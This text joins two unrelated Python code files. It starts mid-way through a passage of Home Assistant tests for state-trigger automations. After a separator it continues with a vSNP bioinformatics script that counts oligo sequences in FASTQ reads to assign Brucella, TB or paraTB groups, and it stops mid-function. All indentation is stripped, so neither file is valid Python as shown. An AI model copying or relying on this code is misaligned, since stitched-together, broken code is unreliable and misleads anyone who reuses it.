with patch.object(state_trigger, "_LOGGER") as mock_logger:
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
assert mock_logger.error.called
async def test_if_not_fires_on_entity_change_with_for(hass, calls):
"""Test for not firing on entity change with for."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
"for": {"seconds": 5},
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
hass.states.async_set("test.entity", "not_world")
await hass.async_block_till_done()
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
await hass.async_block_till_done()
assert len(calls) == 0
async def test_if_not_fires_on_entities_change_with_for_after_stop(hass, calls):
"""Test for not firing on entity change with for after stop trigger."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": ["test.entity_1", "test.entity_2"],
"to": "world",
"for": {"seconds": 5},
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity_1", "world")
hass.states.async_set("test.entity_2", "world")
await hass.async_block_till_done()
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
await hass.async_block_till_done()
assert len(calls) == 1
hass.states.async_set("test.entity_1", "world_no")
hass.states.async_set("test.entity_2", "world_no")
await hass.async_block_till_done()
hass.states.async_set("test.entity_1", "world")
hass.states.async_set("test.entity_2", "world")
await hass.async_block_till_done()
await hass.services.async_call(
automation.DOMAIN,
SERVICE_TURN_OFF,
{ATTR_ENTITY_ID: ENTITY_MATCH_ALL},
blocking=True,
)
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_entity_change_with_for_attribute_change(hass, calls):
"""Test for firing on entity change with for and attribute change."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
"for": {"seconds": 5},
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
utcnow = dt_util.utcnow()
with patch("homeassistant.core.dt_util.utcnow") as mock_utcnow:
mock_utcnow.return_value = utcnow
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
mock_utcnow.return_value += timedelta(seconds=4)
async_fire_time_changed(hass, mock_utcnow.return_value)
hass.states.async_set(
"test.entity", "world", attributes={"mock_attr": "attr_change"}
)
await hass.async_block_till_done()
assert len(calls) == 0
mock_utcnow.return_value += timedelta(seconds=4)
async_fire_time_changed(hass, mock_utcnow.return_value)
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_entity_change_with_for_multiple_force_update(hass, calls):
"""Test for firing on entity change with for and force update."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.force_entity",
"to": "world",
"for": {"seconds": 5},
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
utcnow = dt_util.utcnow()
with patch("homeassistant.core.dt_util.utcnow") as mock_utcnow:
mock_utcnow.return_value = utcnow
hass.states.async_set("test.force_entity", "world", None, True)
await hass.async_block_till_done()
for _ in range(4):
mock_utcnow.return_value += timedelta(seconds=1)
async_fire_time_changed(hass, mock_utcnow.return_value)
hass.states.async_set("test.force_entity", "world", None, True)
await hass.async_block_till_done()
assert len(calls) == 0
mock_utcnow.return_value += timedelta(seconds=4)
async_fire_time_changed(hass, mock_utcnow.return_value)
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_entity_change_with_for(hass, calls):
"""Test for firing on entity change with for."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
"for": {"seconds": 5},
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
await hass.async_block_till_done()
assert 1 == len(calls)
async def test_if_fires_on_entity_change_with_for_without_to(hass, calls):
"""Test for firing on entity change with for."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"for": {"seconds": 5},
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "hello")
await hass.async_block_till_done()
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=2))
await hass.async_block_till_done()
assert len(calls) == 0
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=4))
await hass.async_block_till_done()
assert len(calls) == 0
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_does_not_fires_on_entity_change_with_for_without_to_2(hass, calls):
"""Test for firing on entity change with for."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"for": {"seconds": 5},
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
utcnow = dt_util.utcnow()
with patch("homeassistant.core.dt_util.utcnow") as mock_utcnow:
mock_utcnow.return_value = utcnow
for i in range(10):
hass.states.async_set("test.entity", str(i))
await hass.async_block_till_done()
mock_utcnow.return_value += timedelta(seconds=1)
async_fire_time_changed(hass, mock_utcnow.return_value)
await hass.async_block_till_done()
assert len(calls) == 0
async def test_if_fires_on_entity_creation_and_removal(hass, calls):
"""Test for firing on entity creation and removal, with to/from constraints."""
# set automations for multiple combinations to/from
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: [
{
"trigger": {"platform": "state", "entity_id": "test.entity_0"},
"action": {"service": "test.automation"},
},
{
"trigger": {
"platform": "state",
"from": "hello",
"entity_id": "test.entity_1",
},
"action": {"service": "test.automation"},
},
{
"trigger": {
"platform": "state",
"to": "world",
"entity_id": "test.entity_2",
},
"action": {"service": "test.automation"},
},
],
},
)
await hass.async_block_till_done()
# use contexts to identify trigger entities
context_0 = Context()
context_1 = Context()
context_2 = Context()
# automation with match_all triggers on creation
hass.states.async_set("test.entity_0", "any", context=context_0)
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].context.parent_id == context_0.id
# create entities, trigger on test.entity_2 ('to' matches, no 'from')
hass.states.async_set("test.entity_1", "hello", context=context_1)
hass.states.async_set("test.entity_2", "world", context=context_2)
await hass.async_block_till_done()
assert len(calls) == 2
assert calls[1].context.parent_id == context_2.id
# removal of both, trigger on test.entity_1 ('from' matches, no 'to')
assert hass.states.async_remove("test.entity_1", context=context_1)
assert hass.states.async_remove("test.entity_2", context=context_2)
await hass.async_block_till_done()
assert len(calls) == 3
assert calls[2].context.parent_id == context_1.id
# automation with match_all triggers on removal
assert hass.states.async_remove("test.entity_0", context=context_0)
await hass.async_block_till_done()
assert len(calls) == 4
assert calls[3].context.parent_id == context_0.id
async def test_if_fires_on_for_condition(hass, calls):
"""Test for firing if condition is on."""
point1 = dt_util.utcnow()
point2 = point1 + timedelta(seconds=10)
with patch("homeassistant.core.dt_util.utcnow") as mock_utcnow:
mock_utcnow.return_value = point1
hass.states.async_set("test.entity", "on")
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {
"condition": "state",
"entity_id": "test.entity",
"state": "on",
"for": {"seconds": 5},
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
# not enough time has passed
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
# Time travel 10 secs into the future
mock_utcnow.return_value = point2
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_for_condition_attribute_change(hass, calls):
"""Test for firing if condition is on with attribute change."""
point1 = dt_util.utcnow()
point2 = point1 + timedelta(seconds=4)
point3 = point1 + timedelta(seconds=8)
with patch("homeassistant.core.dt_util.utcnow") as mock_utcnow:
mock_utcnow.return_value = point1
hass.states.async_set("test.entity", "on")
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {
"condition": "state",
"entity_id": "test.entity",
"state": "on",
"for": {"seconds": 5},
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
# not enough time has passed
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
# Still not enough time has passed, but an attribute is changed
mock_utcnow.return_value = point2
hass.states.async_set(
"test.entity", "on", attributes={"mock_attr": "attr_change"}
)
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
# Enough time has now passed
mock_utcnow.return_value = point3
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fails_setup_for_without_time(hass, calls):
"""Test for setup failure if no time is provided."""
with assert_setup_component(0, automation.DOMAIN):
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "event", "event_type": "bla"},
"condition": {
"platform": "state",
"entity_id": "test.entity",
"state": "on",
"for": {},
},
"action": {"service": "test.automation"},
}
},
)
async def test_if_fails_setup_for_without_entity(hass, calls):
"""Test for setup failure if no entity is provided."""
with assert_setup_component(0, automation.DOMAIN):
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"event_type": "bla"},
"condition": {
"platform": "state",
"state": "on",
"for": {"seconds": 5},
},
"action": {"service": "test.automation"},
}
},
)
async def test_wait_template_with_trigger(hass, calls):
"""Test using wait template with 'trigger.entity_id'."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
},
"action": [
{"wait_template": "{{ is_state(trigger.entity_id, 'hello') }}"},
{
"service": "test.automation",
"data_template": {
"some": "{{ trigger.%s }}"
% "}} - {{ trigger.".join(
(
"platform",
"entity_id",
"from_state.state",
"to_state.state",
)
)
},
},
],
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "world")
hass.states.async_set("test.entity", "hello")
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].data["some"] == "state - test.entity - hello - world"
async def test_if_fires_on_entities_change_no_overlap(hass, calls):
"""Test for firing on entities change with no overlap."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": ["test.entity_1", "test.entity_2"],
"to": "world",
"for": {"seconds": 5},
},
"action": {
"service": "test.automation",
"data_template": {"some": "{{ trigger.entity_id }}"},
},
}
},
)
await hass.async_block_till_done()
utcnow = dt_util.utcnow()
with patch("homeassistant.core.dt_util.utcnow") as mock_utcnow:
mock_utcnow.return_value = utcnow
hass.states.async_set("test.entity_1", "world")
await hass.async_block_till_done()
mock_utcnow.return_value += timedelta(seconds=10)
async_fire_time_changed(hass, mock_utcnow.return_value)
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].data["some"] == "test.entity_1"
hass.states.async_set("test.entity_2", "world")
await hass.async_block_till_done()
mock_utcnow.return_value += timedelta(seconds=10)
async_fire_time_changed(hass, mock_utcnow.return_value)
await hass.async_block_till_done()
assert len(calls) == 2
assert calls[1].data["some"] == "test.entity_2"
async def test_if_fires_on_entities_change_overlap(hass, calls):
"""Test for firing on entities change with overlap."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": ["test.entity_1", "test.entity_2"],
"to": "world",
"for": {"seconds": 5},
},
"action": {
"service": "test.automation",
"data_template": {"some": "{{ trigger.entity_id }}"},
},
}
},
)
await hass.async_block_till_done()
utcnow = dt_util.utcnow()
with patch("homeassistant.core.dt_util.utcnow") as mock_utcnow:
mock_utcnow.return_value = utcnow
hass.states.async_set("test.entity_1", "world")
await hass.async_block_till_done()
mock_utcnow.return_value += timedelta(seconds=1)
async_fire_time_changed(hass, mock_utcnow.return_value)
hass.states.async_set("test.entity_2", "world")
await hass.async_block_till_done()
mock_utcnow.return_value += timedelta(seconds=1)
async_fire_time_changed(hass, mock_utcnow.return_value)
hass.states.async_set("test.entity_2", "hello")
await hass.async_block_till_done()
mock_utcnow.return_value += timedelta(seconds=1)
async_fire_time_changed(hass, mock_utcnow.return_value)
hass.states.async_set("test.entity_2", "world")
await hass.async_block_till_done()
assert len(calls) == 0
mock_utcnow.return_value += timedelta(seconds=3)
async_fire_time_changed(hass, mock_utcnow.return_value)
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].data["some"] == "test.entity_1"
mock_utcnow.return_value += timedelta(seconds=3)
async_fire_time_changed(hass, mock_utcnow.return_value)
await hass.async_block_till_done()
assert len(calls) == 2
assert calls[1].data["some"] == "test.entity_2"
async def test_if_fires_on_change_with_for_template_1(hass, calls):
"""Test for firing on change with for template."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
"for": {"seconds": "{{ 5 }}"},
},
"action": {"service": "test.automation"},
}
},
)
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
assert len(calls) == 0
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_change_with_for_template_2(hass, calls):
"""Test for firing on change with for template."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
"for": "{{ 5 }}",
},
"action": {"service": "test.automation"},
}
},
)
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
assert len(calls) == 0
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_change_with_for_template_3(hass, calls):
"""Test for firing on change with for template."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
"for": "00:00:{{ 5 }}",
},
"action": {"service": "test.automation"},
}
},
)
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
assert len(calls) == 0
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_change_with_for_template_4(hass, calls):
"""Test for firing on change with for template."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger_variables": {"seconds": 5},
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
"for": {"seconds": "{{ seconds }}"},
},
"action": {"service": "test.automation"},
}
},
)
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
assert len(calls) == 0
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_change_from_with_for(hass, calls):
"""Test for firing on change with from/for."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "media_player.foo",
"from": "playing",
"for": "00:00:30",
},
"action": {"service": "test.automation"},
}
},
)
hass.states.async_set("media_player.foo", "playing")
await hass.async_block_till_done()
hass.states.async_set("media_player.foo", "paused")
await hass.async_block_till_done()
hass.states.async_set("media_player.foo", "stopped")
await hass.async_block_till_done()
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(minutes=1))
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_not_fires_on_change_from_with_for(hass, calls):
"""Test for firing on change with from/for."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "media_player.foo",
"from": "playing",
"for": "00:00:30",
},
"action": {"service": "test.automation"},
}
},
)
hass.states.async_set("media_player.foo", "playing")
await hass.async_block_till_done()
hass.states.async_set("media_player.foo", "paused")
await hass.async_block_till_done()
hass.states.async_set("media_player.foo", "playing")
await hass.async_block_till_done()
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(minutes=1))
await hass.async_block_till_done()
assert len(calls) == 0
async def test_invalid_for_template_1(hass, calls):
"""Test for invalid for template."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
"for": {"seconds": "{{ five }}"},
},
"action": {"service": "test.automation"},
}
},
)
with patch.object(state_trigger, "_LOGGER") as mock_logger:
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
assert mock_logger.error.called
async def test_if_fires_on_entities_change_overlap_for_template(hass, calls):
"""Test for firing on entities change with overlap and for template."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": ["test.entity_1", "test.entity_2"],
"to": "world",
"for": '{{ 5 if trigger.entity_id == "test.entity_1"'
" else 10 }}",
},
"action": {
"service": "test.automation",
"data_template": {
"some": "{{ trigger.entity_id }} - {{ trigger.for }}"
},
},
}
},
)
await hass.async_block_till_done()
utcnow = dt_util.utcnow()
with patch("homeassistant.core.dt_util.utcnow") as mock_utcnow:
mock_utcnow.return_value = utcnow
hass.states.async_set("test.entity_1", "world")
await hass.async_block_till_done()
mock_utcnow.return_value += timedelta(seconds=1)
async_fire_time_changed(hass, mock_utcnow.return_value)
hass.states.async_set("test.entity_2", "world")
await hass.async_block_till_done()
mock_utcnow.return_value += timedelta(seconds=1)
async_fire_time_changed(hass, mock_utcnow.return_value)
hass.states.async_set("test.entity_2", "hello")
await hass.async_block_till_done()
mock_utcnow.return_value += timedelta(seconds=1)
async_fire_time_changed(hass, mock_utcnow.return_value)
hass.states.async_set("test.entity_2", "world")
await hass.async_block_till_done()
assert len(calls) == 0
mock_utcnow.return_value += timedelta(seconds=3)
async_fire_time_changed(hass, mock_utcnow.return_value)
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].data["some"] == "test.entity_1 - 0:00:05"
mock_utcnow.return_value += timedelta(seconds=3)
async_fire_time_changed(hass, mock_utcnow.return_value)
await hass.async_block_till_done()
assert len(calls) == 1
mock_utcnow.return_value += timedelta(seconds=5)
async_fire_time_changed(hass, mock_utcnow.return_value)
await hass.async_block_till_done()
assert len(calls) == 2
assert calls[1].data["some"] == "test.entity_2 - 0:00:10"
async def test_attribute_if_fires_on_entity_change_with_both_filters(hass, calls):
"""Test for firing if both filters are match attribute."""
hass.states.async_set("test.entity", "bla", {"name": "hello"})
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"from": "hello",
"to": "world",
"attribute": "name",
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "bla", {"name": "world"})
await hass.async_block_till_done()
assert len(calls) == 1
async def test_attribute_if_fires_on_entity_where_attr_stays_constant(hass, calls):
"""Test for firing if attribute stays the same."""
hass.states.async_set("test.entity", "bla", {"name": "hello", "other": "old_value"})
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"attribute": "name",
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
# Leave all attributes the same
hass.states.async_set("test.entity", "bla", {"name": "hello", "other": "old_value"})
await hass.async_block_till_done()
assert len(calls) == 0
# Change the untracked attribute
hass.states.async_set("test.entity", "bla", {"name": "hello", "other": "new_value"})
await hass.async_block_till_done()
assert len(calls) == 0
# Change the tracked attribute
hass.states.async_set("test.entity", "bla", {"name": "world", "other": "old_value"})
await hass.async_block_till_done()
assert len(calls) == 1
async def test_attribute_if_not_fires_on_entities_change_with_for_after_stop(
hass, calls
):
"""Test for not firing on entity change with for after stop trigger."""
hass.states.async_set("test.entity", "bla", {"name": "hello"})
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"from": "hello",
"to": "world",
"attribute": "name",
"for": 5,
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
# Test that the for-check works
hass.states.async_set("test.entity", "bla", {"name": "world"})
await hass.async_block_till_done()
assert len(calls) == 0
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=2))
hass.states.async_set("test.entity", "bla", {"name": "world", "something": "else"})
await hass.async_block_till_done()
assert len(calls) == 0
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
await hass.async_block_till_done()
assert len(calls) == 1
# Now remove state while inside "for"
hass.states.async_set("test.entity", "bla", {"name": "hello"})
hass.states.async_set("test.entity", "bla", {"name": "world"})
await hass.async_block_till_done()
assert len(calls) == 1
hass.states.async_remove("test.entity")
await hass.async_block_till_done()
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
await hass.async_block_till_done()
assert len(calls) == 1
async def test_attribute_if_fires_on_entity_change_with_both_filters_boolean(
hass, calls
):
"""Test for firing if both filters are match attribute."""
hass.states.async_set("test.entity", "bla", {"happening": False})
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"from": False,
"to": True,
"attribute": "happening",
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "bla", {"happening": True})
await hass.async_block_till_done()
assert len(calls) == 1
async def test_variables_priority(hass, calls):
"""Test an externally defined trigger variable is overridden."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger_variables": {"trigger": "illegal"},
"trigger": {
"platform": "state",
"entity_id": ["test.entity_1", "test.entity_2"],
"to": "world",
"for": '{{ 5 if trigger.entity_id == "test.entity_1"'
" else 10 }}",
},
"action": {
"service": "test.automation",
"data_template": {
"some": "{{ trigger.entity_id }} - {{ trigger.for }}"
},
},
}
},
)
await hass.async_block_till_done()
utcnow = dt_util.utcnow()
with patch("homeassistant.core.dt_util.utcnow") as mock_utcnow:
mock_utcnow.return_value = utcnow
hass.states.async_set("test.entity_1", "world")
await hass.async_block_till_done()
mock_utcnow.return_value += timedelta(seconds=1)
async_fire_time_changed(hass, mock_utcnow.return_value)
hass.states.async_set("test.entity_2", "world")
await hass.async_block_till_done()
mock_utcnow.return_value += timedelta(seconds=1)
async_fire_time_changed(hass, mock_utcnow.return_value)
hass.states.async_set("test.entity_2", "hello")
await hass.async_block_till_done()
mock_utcnow.return_value += timedelta(seconds=1)
async_fire_time_changed(hass, mock_utcnow.return_value)
hass.states.async_set("test.entity_2", "world")
await hass.async_block_till_done()
assert len(calls) == 0
mock_utcnow.return_value += timedelta(seconds=3)
async_fire_time_changed(hass, mock_utcnow.return_value)
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].data["some"] == "test.entity_1 - 0:00:05"
mock_utcnow.return_value += timedelta(seconds=3)
async_fire_time_changed(hass, mock_utcnow.return_value)
await hass.async_block_till_done()
assert len(calls) == 1
mock_utcnow.return_value += timedelta(seconds=5)
async_fire_time_changed(hass, mock_utcnow.return_value)
await hass.async_block_till_done()
assert len(calls) == 2
assert calls[1].data["some"] == "test.entity_2 - 0:00:10"
|
|
#!/usr/bin/env python
import argparse
import gzip
import os
from collections import OrderedDict
import yaml
from Bio.SeqIO.QualityIO import FastqGeneralIterator
OUTPUT_DBKEY_DIR = 'output_dbkey'
OUTPUT_METRICS_DIR = 'output_metrics'
def get_sample_name(file_path):
base_file_name = os.path.basename(file_path)
if base_file_name.find(".") > 0:
# Eliminate the extension.
return os.path.splitext(base_file_name)[0]
return base_file_name
def get_dbkey(dnaprints_dict, key, s):
# dnaprints_dict looks something like this:
# {'brucella': {'NC_002945v4': ['11001110', '11011110', '11001100']}
# {'bovis': {'NC_006895': ['11111110', '00010010', '01111011']}}
d = dnaprints_dict.get(key, {})
for data_table_value, v_list in d.items():
if s in v_list:
return data_table_value
return ""
def get_dnaprints_dict(dnaprint_fields):
# A dndprint_fields entry looks something liek this.
# [['AF2122', '/galaxy/tool-data/vsnp/AF2122/dnaprints/NC_002945v4.yml']]
dnaprints_dict = {}
for item in dnaprint_fields:
# Here item is a 2-element list of data
# table components, # value and path.
value = item[0]
path = item[1].strip()
with open(path, "rt") as fh:
# The format of all dnaprints yaml
# files is something like this:
# brucella:
# - 0111111111111111
print_dict = yaml.load(fh, Loader=yaml.Loader)
for print_dict_k, print_dict_v in print_dict.items():
dnaprints_v_dict = dnaprints_dict.get(print_dict_k, {})
if len(dnaprints_v_dict) > 0:
# dnaprints_dict already contains k (e.g., 'brucella',
# and dnaprints_v_dict will be a dictionary # that
# looks something like this:
# {'NC_002945v4': ['11001110', '11011110', '11001100']}
value_list = dnaprints_v_dict.get(value, [])
value_list = value_list + print_dict_v
dnaprints_v_dict[value] = value_list
else:
# dnaprints_v_dict is an empty dictionary.
dnaprints_v_dict[value] = print_dict_v
dnaprints_dict[print_dict_k] = dnaprints_v_dict
# dnaprints_dict looks something like this:
# {'brucella': {'NC_002945v4': ['11001110', '11011110', '11001100']}
# {'bovis': {'NC_006895': ['11111110', '00010010', '01111011']}}
return dnaprints_dict
def get_group_and_dbkey(dnaprints_dict, brucella_string, brucella_sum, bovis_string, bovis_sum, para_string, para_sum):
if brucella_sum > 3:
group = "Brucella"
dbkey = get_dbkey(dnaprints_dict, "brucella", brucella_string)
elif bovis_sum > 3:
group = "TB"
dbkey = get_dbkey(dnaprints_dict, "bovis", bovis_string)
elif para_sum >= 1:
group = "paraTB"
dbkey = get_dbkey(dnaprints_dict, "para", para_string)
else:
group = ""
dbkey = ""
return group, dbkey
def get_oligo_dict():
oligo_dict = {}
oligo_dict["01_ab1"] = "AATTGTCGGATAGCCTGGCGATAACGACGC"
oligo_dict["02_ab3"] = "CACACGCGGGCCGGAACTGCCGCAAATGAC"
oligo_dict["03_ab5"] = "GCTGAAGCGGCAGACCGGCAGAACGAATAT"
oligo_dict["04_mel"] = "TGTCGCGCGTCAAGCGGCGTGAAATCTCTG"
oligo_dict["05_suis1"] = "TGCGTTGCCGTGAAGCTTAATTCGGCTGAT"
oligo_dict["06_suis2"] = "GGCAATCATGCGCAGGGCTTTGCATTCGTC"
oligo_dict["07_suis3"] = "CAAGGCAGATGCACATAATCCGGCGACCCG"
oligo_dict["08_ceti1"] = "GTGAATATAGGGTGAATTGATCTTCAGCCG"
oligo_dict["09_ceti2"] = "TTACAAGCAGGCCTATGAGCGCGGCGTGAA"
oligo_dict["10_canis4"] = "CTGCTACATAAAGCACCCGGCGACCGAGTT"
oligo_dict["11_canis"] = "ATCGTTTTGCGGCATATCGCTGACCACAGC"
oligo_dict["12_ovis"] = "CACTCAATCTTCTCTACGGGCGTGGTATCC"
oligo_dict["13_ether2"] = "CGAAATCGTGGTGAAGGACGGGACCGAACC"
oligo_dict["14_63B1"] = "CCTGTTTAAAAGAATCGTCGGAACCGCTCT"
oligo_dict["15_16M0"] = "TCCCGCCGCCATGCCGCCGAAAGTCGCCGT"
oligo_dict["16_mel1b"] = "TCTGTCCAAACCCCGTGACCGAACAATAGA"
oligo_dict["17_tb157"] = "CTCTTCGTATACCGTTCCGTCGTCACCATGGTCCT"
oligo_dict["18_tb7"] = "TCACGCAGCCAACGATATTCGTGTACCGCGACGGT"
oligo_dict["19_tbbov"] = "CTGGGCGACCCGGCCGACCTGCACACCGCGCATCA"
oligo_dict["20_tb5"] = "CCGTGGTGGCGTATCGGGCCCCTGGATCGCGCCCT"
oligo_dict["21_tb2"] = "ATGTCTGCGTAAAGAAGTTCCATGTCCGGGAAGTA"
oligo_dict["22_tb3"] = "GAAGACCTTGATGCCGATCTGGGTGTCGATCTTGA"
oligo_dict["23_tb4"] = "CGGTGTTGAAGGGTCCCCCGTTCCAGAAGCCGGTG"
oligo_dict["24_tb6"] = "ACGGTGATTCGGGTGGTCGACACCGATGGTTCAGA"
oligo_dict["25_para"] = "CCTTTCTTGAAGGGTGTTCG"
oligo_dict["26_para_sheep"] = "CGTGGTGGCGACGGCGGCGGGCCTGTCTAT"
oligo_dict["27_para_cattle"] = "TCTCCTCGGTCGGTGATTCGGGGGCGCGGT"
return oligo_dict
def get_seq_counts(value, fastq_list, gzipped):
count = 0
for fastq_file in fastq_list:
if gzipped:
with gzip.open(fastq_file, 'rt') as fh:
for title, seq, qual in FastqGeneralIterator(fh):
count += seq.count(value)
else:
with open(fastq_file, 'r') as fh:
for title, seq, qual in FastqGeneralIterator(fh):
count += seq.count(value)
return(value, count)
def get_species_counts(fastq_list, gzipped):
count_summary = {}
oligo_dict = get_oligo_dict()
for v1 in oligo_dict.values():
returned_value, count = get_seq_counts(v1, fastq_list, gzipped)
for key, v2 in oligo_dict.items():
if returned_value == v2:
count_summary.update({key: count})
count_list = []
for v in count_summary.values():
count_list.append(v)
brucella_sum = sum(count_list[:16])
bovis_sum = sum(count_list[16:24])
para_sum = sum(count_list[24:])
return count_summary, count_list, brucella_sum, bovis_sum, para_sum
def get_species_strings(count_summary):
binary_dictionary = {}
for k, v in count_summary.items():
if v > 1:
binary_dictionary.update({k: 1})
else:
binary_dictionary.update({k: 0})
binary_dictionary = OrderedDict(sorted(binary_dictionary.items()))
binary_list = []
for v in binary_dictionary.values():
binary_list.append(v)
brucella_binary = binary_list[:16]
brucella_string = ''.join(str(e) for e in brucella_binary)
bovis_binary = binary_list[16:24]
